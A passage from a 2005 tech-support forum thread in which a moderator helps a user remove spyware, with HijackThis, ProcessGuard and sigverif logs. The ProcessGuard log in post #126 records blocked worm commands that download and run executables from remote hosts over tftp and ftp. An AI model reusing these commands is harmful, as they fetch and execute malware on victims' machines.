Telnet: C:\WINDOWS\System32\tlntsvr.exe (disabled)
Distributed Link Tracking Client: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Windows User Mode Driver Framework: C:\WINDOWS\System32\wdfmgr.exe (manual start)
Microcode Update Driver: System32\DRIVERS\update.sys (manual start)
Upload Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Universal Plug and Play Device Host: %SystemRoot%\System32\svchost.exe -k LocalService (manual start)
Uninterruptible Power Supply: %SystemRoot%\System32\ups.exe (manual start)
USB2 Enabled Hub: System32\DRIVERS\usbhub.sys (manual start)
USB Mass Storage Driver: System32\DRIVERS\USBSTOR.SYS (manual start)
Microsoft USB Universal Host Controller Miniport Driver: System32\DRIVERS\usbuhci.sys (manual start)
VGA Display Controller.: \SystemRoot\System32\drivers\vga.sys (system)
VIA AGP Bus Filter: System32\DRIVERS\viaagp.sys (system)
VIA AGP Filter: System32\DRIVERS\viaagp1.sys (system)
ViaIde: System32\DRIVERS\viaide.sys (system)
VIA AC'97 Enhanced Audio Controller (WDM): system32\drivers\viaudio.sys (manual start)
Volume Shadow Copy: %SystemRoot%\System32\vssvc.exe (manual start)
Windows Time: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Remote Access IP ARP Driver: System32\DRIVERS\wanarp.sys (manual start)
Microsoft WINMM WDM Audio Compatibility Driver: system32\drivers\wdmaud.sys (manual start)
WebClient: %SystemRoot%\System32\svchost.exe -k LocalService (autostart)
Windows Management Instrumentation: %systemroot%\system32\svchost.exe -k netsvcs (autostart)
Logitech Virtual Bus Enumerator Driver: system32\drivers\WmBEnum.sys (manual start)
Portable Media Serial Number Service: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Portable Media Serial Number: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Logitech Gaming HID Filter Driver: system32\drivers\WmFilter.sys (manual start)
Logitech Gaming USB Filter Driver: system32\drivers\WmHidLo.sys (manual start)
Windows Management Instrumentation Driver Extensions: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
WMI Performance Adapter: C:\WINDOWS\System32\wbem\wmiapsrv.exe (manual start)
Logitech Virtual Hid Device Driver: system32\drivers\WmVirHid.sys (manual start)
Logitech WingMan Translation Layer Driver: system32\drivers\WmXlCore.sys (manual start)
World Standard Teletext Codec: System32\DRIVERS\WSTCODEC.SYS (manual start)
Automatic Updates: %systemroot%\system32\svchost.exe -k netsvcs (autostart)
Wireless Zero Configuration: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)


--------------------------------------------------

Enumerating Windows NT logon/logoff scripts:
*No scripts set to run*

Windows NT checkdisk command:
BootExecute = autocheck autochk *

Windows NT 'Wininit.ini':
PendingFileRenameOperations: *Registry value not found*

--------------------------------------------------

Enumerating ShellServiceObjectDelayLoad items:

PostBootReminder: C:\WINDOWS\system32\SHELL32.dll
CDBurn: C:\WINDOWS\system32\SHELL32.dll
WebCheck: C:\WINDOWS\System32\webcheck.dll
SysTray: C:\WINDOWS\System32\stobject.dll
UPnPMonitor: C:\WINDOWS\System32\upnpui.dll

--------------------------------------------------
Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

*Registry key not found*

--------------------------------------------------

End of report, 34,645 bytes
Report generated in 0.157 seconds

Command line options:
/verbose - to add additional info on each section
/complete - to include empty sections and unsuspicious data
/full - to include several rarely-important sections
/force9x - to include Win9x-only startups even if running on WinNT
/forcent - to include WinNT-only startups even if running on Win9x
/forceall - to include all Win9x and WinNT startups, regardless of platform
/history - to list version history only
thanks for your help
  • 0

#123
Metallica
Posted 08 August 2005 - 04:37 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
It looks as if our plan worked. :tazz:

Can you post a fresh HijackThis log and let me know how your computer is behaving?

Regards,
  • 0

#124
duglartis
Posted 10 August 2005 - 01:03 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello i have had a couple of popups recomending websites to fix the registery no AVG popup windows have done a full virus scan and it removed 17 entries from the restore folder
here is the hijack log
Logfile of HijackThis v1.99.1
Scan saved at 6:59:22 p.m., on 10/08/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\documents and settings\dug and tania\my documents\downloads\regprot.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\ProcessGuard\procguard.exe
C:\WINDOWS\System32\rundll32.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Documents and Settings\Dug And Tania\My Documents\hijack\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://netaccess.co.nz/
F2 - REG:system.ini: UserInit=userinit.exe,xpjava.exe
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [AdaptecDirectCD] C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O4 - HKLM\..\Run: [RegProt] c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O8 - Extra context menu item: Linked ima&ges - C:\Program Files\IEimage\IEimage.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O15 - Trusted Zone: http://www.giftedonl...edusearch.co.nz
O15 - Trusted Zone: http://ny.contentmatch.net (HKLM)
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/download/ipixx.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupd...b?1098860877234
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoft.../as5/asinst.cab
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
thanks for your help
  • 0

#125
duglartis
Posted 10 August 2005 - 03:47 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello again have had a couple of funny progammes trying to start here is the pg log for today
---Process Guard Log Started---
Wed 10 - 21:44:34 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 10 - 21:44:34 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1300]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 10 - 21:44:35 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 10 - 21:44:37 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Wed 10 - 21:44:37 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 10 - 21:44:38 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 10 - 21:44:38 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 10 - 21:44:38 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed 10 - 21:44:38 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Wed 10 - 21:44:38 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1964]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Wed 10 - 21:44:39 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Wed 10 - 21:44:39 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Wed 10 - 21:44:40 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Wed 10 - 21:44:40 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Wed 10 - 21:44:40 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Wed 10 - 21:44:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Wed 10 - 21:44:40 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Wed 10 - 21:44:41 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [320]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Wed 10 - 21:44:42 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 10 - 21:44:42 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 10 - 21:44:58 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program fil
  • 0

#126
duglartis
Posted 10 August 2005 - 03:49 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Process Guard Log Started---
Wed 10 - 21:15:01 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1316]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 10 - 21:15:02 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 10 - 21:15:02 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 10 - 21:15:04 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Wed 10 - 21:15:04 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 10 - 21:15:05 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 10 - 21:15:05 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 10 - 21:15:05 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed 10 - 21:15:05 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Wed 10 - 21:15:05 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1956]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Wed 10 - 21:15:06 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Wed 10 - 21:15:06 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Wed 10 - 21:15:06 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Wed 10 - 21:15:06 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Wed 10 - 21:15:07 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Wed 10 - 21:15:07 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Wed 10 - 21:15:07 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [312]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Wed 10 - 21:15:08 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Wed 10 - 21:15:09 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 10 - 21:15:09 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 10 - 21:15:43 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 10 - 21:15:48 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsd1dc9db402e00a4ea36644568b953238 ]
Wed 10 - 21:15:48 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds55e3ee1818e6574094c9c6d2613b5733 ]
Wed 10 - 21:15:48 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds3826709400a7474eba07c3cc8f09a8fd ]
Wed 10 - 21:15:48 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds173914a66e43e7438818165a583c411f ]
Wed 10 - 21:19:35 [EXECUTION] "c:\program files\outlook express\msimn.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" ]
Wed 10 - 21:19:38 [EXECUTION] "c:\program files\messenger\msmsgs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ "c:\program files\messenger\msmsgs.exe" -embedding ]
Wed 10 - 21:20:43 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ tftp.exe -i 202.124.151.118 get msconfig32.exe ]
Wed 10 - 21:20:58 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 932 -h 1944 "global\05d5973f841819c79c" ]
Wed 10 - 21:21:02 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 932 -h 1944 "global\05dfc83f841819c1ac" ]
Wed 10 - 21:21:13 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [2008]
[EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]
Wed 10 - 21:21:24 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd /c echo open redirect.toruncity.biz 5192 >socket64.dll &echo user http http >>socket64.dll &echo binary >>socket64.dll &echo get >>socket64.dll &echo o.exe >>socket64.dll &echo o.exe >>socket64.dll &echo bye >>socket64.dll &ftp.exe -n -s:socket64.dll &del socket64.dll &o.exe
]
Wed 10 - 21:43:00 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Wed 10 - 21:43:29 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1052]
  • 0

#127
Metallica
Posted 10 August 2005 - 04:38 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Check the items listed below in HijackThis, close all windows except HijackThis and click Fix checked:

F2 - REG:system.ini: UserInit=userinit.exe,xpjava.exe

Then reboot.

Click Start > Run> type sigverif > OK
A prompt will come up, click Advanced and on the Logging tab enable logging.
Then click OK and Start.
The computer will scan all system files for their digital "Autograph" and list the one that don't have one.

A file called sigverif.txt will be made (I think in C:\Windows unless they specified different). Post the content of that file.

Screenshots:
http://www.windowsit...&ArticleID=7918

Also see if you have files called:
socket64.dll
msconfig32.exe

Regards,
  • 0

#128
duglartis
Posted 11 August 2005 - 03:03 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello here is the log i searched for socket64 and msconfig but did not find them
thanks for all your help and patience i really appreccciate it
Microsoft Signature Verification

Log file generated on 8/11/2005 at 8:50 PM
OS Platform: Windows 2000 (x86), Version: 5.1, Build: 2600, CSDVersion: Service Pack 1
Scan Results: Total Files: 3219, Signed: 2220, Unsigned: 0, Not Scanned: 999

File Modified Version Status Catalog Signed By
------------------ ------------ ----------- ------------ ----------- -------------------
[c:\documents and settings\all users\application data\microsoft\network\connections\pbk]
sharedaccess.ini 7/21/2001 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\microsoft shared\dao]
dao360.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\microsoft shared\msinfo]
ieinfo5.ocx 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msinfo32.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\microsoft shared\speech]
sapi.cpl 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
sapi.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
sapisvr.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\microsoft shared\speech\1033]
spcplui.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\microsoft shared\triedit]
dhtmled.ocx 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
triedit.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\microsoft shared\vgx]
vgx.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\microsoft shared\web server extensions\40\bin]
fp4autl.dll 8/29/2002 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
fpencode.dll 8/29/2002 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\mssoap\binaries]
mssoap1.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wisc10.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\mssoap\binaries\resources\1033]
mssoapr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\speechengines\microsoft]
spcommon.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\speechengines\microsoft\lexicon\1033]
ltts1033.lxa 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
r1033tts.lxa 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\speechengines\microsoft\tts\1033]
sam.sdf 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
sam.spd 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
spttseng.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\system]
directdb.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wab32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
wab32res.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\system\ado]
msader15.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msado15.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msado20.tlb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msado21.tlb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msado25.tlb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msado26.tlb 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadomd.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msador15.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadox.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadrh15.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msjro.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
[c:\program files\common files\system\msadc]
msadce.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadcer.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadcf.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadcfr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadco.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadcor.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadcs.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msadds.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msaddsr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaprsr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
msdaprst.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
